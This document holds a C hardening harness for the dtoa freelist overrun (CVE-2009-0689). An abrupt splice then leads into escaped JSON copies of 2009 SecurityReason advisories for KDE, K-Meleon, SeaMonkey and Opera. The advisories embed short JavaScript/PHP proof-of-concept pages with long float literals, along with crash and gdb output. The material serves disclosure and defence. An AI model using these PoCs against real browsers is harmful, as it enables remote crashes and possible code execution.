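void bfree_hardened(Bigint *v)
{
    if (!v)
        return;
    if (v->k > KMAX) {
        free(v);
        return;
    }
    v->next = freelist[v->k];
    freelist[v->k] = v;
}

/* Number of cached blocks on freelist[k], or -1 when k is not a valid slot. */
int freelist_count(int k)
{
    int n = 0;

    if (!freelist_index_in_bounds(k))
        return -1;
    for (Bigint *p = freelist[k]; p; p = p->next)
        n++;
    return n;
}

/* Allocate and free one block of class k through the hardened routines and
 * report what freelist[k] holds afterwards (-1: the block went to free()). */
int hardened_roundtrip(int k)
{
    Bigint *b = balloc_hardened(k);

    if (!b || b->maxwds != (1 << k))
        return -2;
    bfree_hardened(b);
    return freelist_count(k);
}

int main(void)
{
    long nd = 296450;   /* mantissa length used by the PoCs on this page */
    int k = s2b_size_class(nd);

    printf("%ld digits -> size class k=%d (Kmax=%d): freelist[%d] is %s\n",
           nd, k, KMAX, k,
           freelist_index_in_bounds(k) ? "in bounds" : "OUT OF BOUNDS");
    printf("hardened roundtrip for k=%d -> %d\n", k, hardened_roundtrip(k));
    return 0;
}
```

The 296450-digit mantissa from the PoCs packs into 32939 nine-digit words, and the next power of two is 2^16, so k = 16 while the array's last valid index is 15; the 333333-digit and 299999-digit variants land on the same class. In the hardened pair a class above Kmax never touches the array: it is malloc()ed on allocation and free()d on release, so the roundtrip reports -1 (nothing cached) instead of writing a heap pointer one slot past the end of freelist[].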
Secunia\r\nreported that this vulnerability had only been detected in Mozilla Firefox, but nobody was aware that\r\nthe problem affects other products (such as KDE and Chrome) and that it is the same bug as "CVE-2009-0689". After\r\nsome time the Mozilla Foundation Security Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html")\r\nwas updated with the note:\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that\r\nreported against the libc gdtoa routine by Maksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact (a new CVE number for the Firefox vulnerability) and the JavaScript PoC (from Secunia) forced\r\nus to officially notify all other vendors. We publish all the individual advisories to formally\r\nshow all vulnerable software and to avoid wrong CVE numbers. We do not see any other way to get this\r\nissue fixed in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD 
fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb
/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2HsACgkQpiCeOKaYa9abFgCeOj6IX5FzaAq60qQ3TUPGUiU6\r\nKJkAoJiZ0eZtGXR0GvwfPT4y5A4yKFqw\r\n=hMGC\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22815", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22815", "title": "KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - K-Meleon 1.5.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/72\r\n\r\n\r\n- --- 0.Description ---\r\nK-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko layout\r\nengine developed by Mozilla which is also used by Firefox. K-Meleon is free, open source software\r\nreleased under the GNU General Public License and is designed specifically for Microsoft Windows\r\n(Win32) operating systems.\r\n\r\n\r\n- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. 
K-Meleon has the same dtoa as KDE, Opera and all\r\nBSD systems. This issue has been fixed in Firefox 3.5.4. It is the same flaw as SREASONRES:20090625,\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut the fix for SREASONRES:20090625 used by OpenBSD was not good. \r\nMore information about the fix for OpenBSD and similar systems is in SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create a float with any number of digits, which will overwrite memory. Kmax is defined as 15.\r\nThe dtoa functions do not check the Kmax limit, so element 16 or higher of the freelist\r\narray can be accessed.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nK-Meleon will crash with\r\n\r\nUnhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access violation reading location\r\n0x0bc576ec.\r\n\r\n01800754 mov eax,dword ptr [ecx] \r\n\r\nEAX 00000002 \r\nECX 0BC576EC \r\nEDI 028FEB51 \r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficially, SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that it would inform all vendors about this issue;\r\nhowever, it did not do so. Even greater confusion was caused by the new CVE number "CVE-2009-1563". Secunia\r\nreported that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that\r\nthe problem affects other products (such as KDE and Chrome) and that it is the same flaw as "CVE-2009-0689". 
After\r\nsome time Mozilla Foundation Security Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html")\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that\r\nreported against the libc gdtoa routine by Maksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in javascript (from Secunia), forced\r\nus to official notification all other vendors. We publish all the individual advisories, to formally\r\nshow all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this\r\nissue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa algorithm is not optimal and\r\nallows remote Denial of Service in Firefox 3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD 
fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb
/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2NoACgkQpiCeOKaYa9ZidgCfUul3XpJA9x7xjTmAJTxCa/XU\r\nhiAAoIiVchZUxMkFgHEgXicv+UwhNaz0\r\n=bAay\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22816", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22816", "title": "K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - SeaMonkey 1.1.18\r\n\r\nFixed in:\r\n- - SeaMonkey 2.0\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/71\r\n\r\n\r\n- --- 0.Description ---\r\nThe SeaMonkey project is a community effort to develop the SeaMonkey all-in-one internet application\r\nsuite (see below). Such a software suite was previously made popular by Netscape and Mozilla, and the\r\nSeaMonkey project continues to develop and deliver high-quality updates to this concept. 
Containing\r\nan Internet browser, email & newsgroup client with an included web feed reader, HTML editor, IRC chat\r\nand web development tools, SeaMonkey is sure to appeal to advanced users, web developers and\r\ncorporate users.\r\n\r\n\r\n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code execution) ---\r\nThe main problem exist in dtoa implementation. SeaMonkey has the same dtoa as a KDE, Opera and all\r\nBSD systems. This issue has been fixed in Firefox 3.5.4 and fix\r\n\r\nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42\r\n\r\nhas been used to patch SeaMonkey 2.0.\r\n\r\nThis flaw has been detected in may 2009 and signed SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good. \r\nMore information about fix for openbsd and similars SREASONRES:20091030, \r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In Kmax has defined 15.\r\nFunctions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist\r\narray.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("9",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat("1",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\n127# gdb seamonkey-bin seamonkey-bin.core\r\n...\r\n#0 0x28df0ecb in ?? 
()\r\n...\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x2 2\r\nedx 0xbfbfd2fc -1077947652\r\nebx 0x28da9b6c 685415276\r\nesp 0xbfbfd2ac 0xbfbfd2ac\r\nebp 0xbfbfd2c8 0xbfbfd2c8\r\nesi 0xb 11\r\nedi 0xb 11\r\neip 0x28df0ecb 0x28df0ecb\r\n...\r\n\r\nesi = esi = 11\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all vendors about this issue,\r\nhowever, they did not do it. Even greater confusion caused new CVE number "CVE-2009-1563". Secunia\r\nhas informed that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that\r\nthe problem affects other products like ( KDE, Chrome ) and it is based on "CVE-2009-0689". After\r\nsome time Mozilla Foundation Security Advisory\r\n("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html")\r\nwas updated with note :\r\n"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that\r\nreported against the libc gdtoa routine by Maksymilian Arciemowicz ( CVE-2009-0689)".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in javascript (from Secunia), forced\r\nus to official notification all other vendors. We publish all the individual advisories, to formally\r\nshow all vulnerable software and to avoid wrong CVE number. We do not see any other way to fix this\r\nissue in all products.\r\n\r\nPlease note:\r\nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa algorithm is not optimal and\r\nallows remote Denial of Service in Firefox 3.5.5 giving long float number.\r\n\r\n\r\n- --- 4. 
Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD fix:\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strt
odI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n- --- 5. Credits ---\r\nDiscovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.\r\n\r\n\r\n- --- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n- --- 7. 
Contact ---\r\nEmail: \r\n- - cxib {a.t] securityreason [d0t} com\r\n- - sp3x {a.t] securityreason [d0t} com \r\n\r\nGPG: \r\n- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- - http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\r\n-----BEGIN PGP SIGNATURE-----\r\n\r\niEYEARECAAYFAksF2IQACgkQpiCeOKaYa9Z2vgCgvqQwFzfwqYsBNbL2To29/o6D\r\nZBgAn0bwlhNtD89nVWtxI2Qf0UA7/ZqB\r\n=JY6k\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-20T00:00:00", "published": "2009-11-20T00:00:00", "id": "SECURITYVULNS:DOC:22813", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22813", "title": "SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - Opera 10.01\r\n- - Opera 10.10 Beta\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/73\r\n\r\n\r\n- --- 0.Description ---\r\nOpera is a Web browser and Internet suite developed by the Opera Software company. The browser\r\nhandles common Internet-related tasks such as displaying Web sites, sending and receiving e-mail\r\nmessages, managing contacts, IRC online chatting, downloading files via BitTorrent, and reading Web\r\nfeeds. Opera is offered free of charge for personal computers and mobile phones.\r\n\r\n\r\n- --- 1. 
